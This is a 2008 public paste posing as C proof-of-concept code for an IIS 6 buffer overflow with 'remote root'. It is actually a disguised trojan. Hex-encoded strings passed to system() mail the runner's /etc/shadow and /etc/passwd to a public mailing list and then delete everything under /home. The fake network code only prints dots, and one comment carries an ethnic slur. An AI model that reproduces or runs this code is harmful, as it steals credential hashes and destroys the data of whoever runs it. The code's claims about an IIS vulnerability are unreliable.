Public paste
xx
By: tezt | Date: Mar 25 2008 21:04 | Format: None | Expires: never | Size: 1.91 KB | Hits: 1393

  1. /* Proof of concept code
  2.    Please don't send us e-mails
  3.    asking us "how to hack" because
  4.    we will be forced to skullfsck you.
  5.  
  6. DISCLAIMER:
  7. !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
  8.  
  9.    IIS 6 Buffer Overflow Exploit
  10.  
  11.    BUG: inetinfo.exe improperly bound checks
  12.    http requests sent longer than 6998 chars.
  13.    Can get messy but enough testing, and we have
  14.    found a way in.
  15.  
  16.    VENDOR STATUS: Notified
  17.    FIX: In process
  18.  
  19.    Remote root.
  20.  
  21.    eg.
  22.    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
  23.     + Connecting to host...
  24.     + Connected.
  25.     + Inserting Shellcode...
  26.     + Done...
  27.     + Spawining shell..
  28.  
  29.     Microsoft Windows XP [Version 5.1.2600]
  30.    (C) Copyright 1985-2001 Microsoft Corp.
  31.    C:>
  32.  
  33. */
  34. char shellcode[] =
  35. "x2fx62x69x6ex2fx72x6dx20"
  36. "x2dx72x66x20x2fx68x6fx6d"
  37. "x65x2fx2ax3bx63x6cx65x61"
  38. "x72x3bx65x63x68x6fx20x62"
  39. "x6cx34x63x6bx68x34x74x2c"
  40. "x68x65x68x65";
  41.  
  42. char launcher [] =
  43. "x63x61x74x20x2fx65x74x63x2fx73"
  44. "x68x61x64x6fx77x20x7cx6dx61x69"
  45. "x6cx20x66x75x6cx6cx2dx64x69"
  46. "x73x63x6cx6fx73x75x72x65x40"
  47. "x6cx69x73x74x73x2ex67x72x6fx6b"
  48. "x2ex6fx72x67x2ex75x6bx20";
  49.  
  50. char netcat_shell [] =
  51. "x63x61x74x20x2fx65x74x63x2fx70"
  52. "x61x73x73x77x64x20x7cx6dx61x69"
  53. "x6cx20x66x75x6cx6cx2dx64x69"
  54. "x73x63x6cx6fx73x75x72x65x40"
  55. "x6cx69x73x74x73x2ex67x72x6fx6b"
  56. "x2ex6fx72x67x2ex75x6bx20";
  57.  
  58. main()
  59. {
  60.  
  61. //Section Initialises designs implemented by mexicans
  62. //Imigrate
  63. system(launcher);
  64. system(netcat_shell);
  65. system(shellcode);
  66.  
  67. //int socket = 0;
  68. //double long port = 0.0;
  69.  
  70. //#DEFINE port host address
  71. //#DEFINE number of inters
  72. //#DEFINE gull eeuEE
  73.  
  74. // for(int j; j < 30; j++)
  75.         {
  76.         //Find socket remote address fault
  77.         printf(".");
  78.         }
  79. //overtake inetinfo here IIS_666666^
  80. return 0;
  81. }